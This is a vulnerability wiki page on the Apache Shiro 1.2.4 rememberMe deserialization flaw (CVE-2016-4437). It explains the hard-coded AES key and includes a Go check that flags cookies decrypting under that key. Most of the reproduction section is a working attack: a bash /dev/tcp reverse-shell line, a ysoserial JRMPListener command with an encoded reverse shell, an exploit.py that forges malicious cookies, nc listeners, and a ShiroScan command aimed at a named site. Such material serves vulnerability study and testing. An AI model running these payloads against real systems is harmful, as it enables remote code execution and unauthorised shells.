Source: 湛蓝安全空间 wiki, yougar0.github.io collection (based on the 零组 public vulnerability library and PeiQi 文库), file dated 2021-04-21 09:23:46
(CVE-2016-4437) Apache Shiro 1.2.4 Deserialization Vulnerability
================================================================
    
1. Vulnerability Overview
-------------------------
    
Apache Shiro uses `CookieRememberMeManager` by default. Its cookie-handling flow is: read the `rememberMe` cookie value --> `Base64 decode` --> `AES decrypt` --> `deserialize`. Because the AES key is hard-coded, an attacker who knows it can craft malicious data that the application deserializes, yielding a deserialization RCE vulnerability.
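As an added example (not from the original page), a defender-side check in Go that replays the same Base64 --> AES-CBC pipeline with the hard-coded key: a `rememberMe` cookie that decrypts to a Java serialization header (`AC ED 00 05`) under the default key is either an exploitation attempt in the logs or proof that the deployment still uses the shipped key. The `MakeCookie` helper and the fixed IV are constructed only to build sample inputs for the demo.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
)
// Shiro 1.2.4's hard-coded default rememberMe key, the one exploit.py above uses.
const defaultKeyB64 = "kPH+bIxk5D2deZiIxcaaaA=="

// Header every java.io.ObjectOutputStream writes (STREAM_MAGIC, STREAM_VERSION).
var javaStreamMagic = []byte{0xAC, 0xED, 0x00, 0x05}
// DecryptsUnderDefaultKey replays Shiro's pipeline (Base64 -> AES-CBC with IV prefix)
// using the default key; a wrong key yields pseudo-random bytes, so the magic is the tell.
func DecryptsUnderDefaultKey(cookie string) (bool, error) {
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil {
		return false, err
	}
	// Layout is IV || ciphertext: need the IV plus at least one whole block.
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return false, fmt.Errorf("bad length %d: not IV plus whole AES blocks", len(raw))
	}
	key, _ := base64.StdEncoding.DecodeString(defaultKeyB64)
	block, _ := aes.NewCipher(key) // 16-byte key, cannot fail
	plain := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(plain, raw[aes.BlockSize:])
	return bytes.HasPrefix(plain, javaStreamMagic), nil
}

// MakeCookie builds a rememberMe value the way Shiro does (PKCS#7 pad, AES-CBC,
// IV prepended, Base64). Constructed helper, used only to build sample inputs.
func MakeCookie(keyB64 string, iv, payload []byte) string {
	key, _ := base64.StdEncoding.DecodeString(keyB64)
	block, _ := aes.NewCipher(key)
	n := aes.BlockSize - len(payload)%aes.BlockSize
	padded := append(append([]byte{}, payload...), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, iv...), ct...))
}

func main() {
	iv := bytes.Repeat([]byte{0x42}, aes.BlockSize) // fixed IV so the demo is repeatable
	hit, _ := DecryptsUnderDefaultKey(MakeCookie(defaultKeyB64, iv, append(javaStreamMagic, 0x73, 0x72)))
	fmt.Println("serialized stream under default key:", hit)
}
```

Shiro 1.2.5 and later no longer ship this key, but a deployment that copied the old value into its own configuration is flagged by the same check.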
    
2. Affected Versions
--------------------

Apache Shiro <= 1.2.4
    
3. Reproduction
---------------
    
### Collected keys
    
(The page's list of roughly one hundred candidate `rememberMe` keys is omitted here.)
    
### Bash payload encoder

##### http://www.jackson-t.ca/runtime-exec-payloads.html
    
    bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
    
(screenshot: 1.png)
    
Method 1
--------
    
### Start an RMI registry (JRMP listener) on the VPS
    
    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'
    
(screenshot: 4.png)
    
### Generate the payload
    
    python exploit.py vps:1099
    
(screenshot: 5.png)

**exploit.py**
    
    import sys
    import uuid
    import base64
    import subprocess
    from Crypto.Cipher import AES  # pycryptodome


    def encode_rememberme(command):
        # Let ysoserial emit a JRMPClient gadget that points at the host:port given on the command line
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
        BS = AES.block_size
        # PKCS#7 padding, the scheme Shiro's AES cipher service expects
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        # Shiro 1.2.4's hard-coded default rememberMe key
        key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
        iv = uuid.uuid4().bytes  # random 16-byte IV
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        file_body = pad(popen.stdout.read())
        # Shiro stores IV || ciphertext, then Base64-encodes the whole thing
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext


    if __name__ == '__main__':
        payload = encode_rememberme(sys.argv[1])
        print("rememberMe={0}".format(payload.decode()))
    
### Listen with nc
    
    nc -lvvp 8888
    
### Send the generated payload with Burp
    
(screenshot: 6.png)
    
### Shell obtained
    
(screenshot: 7.png)
    
Method 2 (in real-world testing, some sites may not succeed)
------------------------------------------------------------
    
### PoC

##### https://github.com/ianxtianxt/ShiroScan
    
**First, start a listener on the server**
    
    nc -lvvp 1234
    
**Run the PoC to trigger the reverse shell**
    
    python3 shiro.py https://www.0-sec.org "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"
    
(screenshot: 2.png)
    
**Shell obtained**

(screenshot: 3.png)
    
    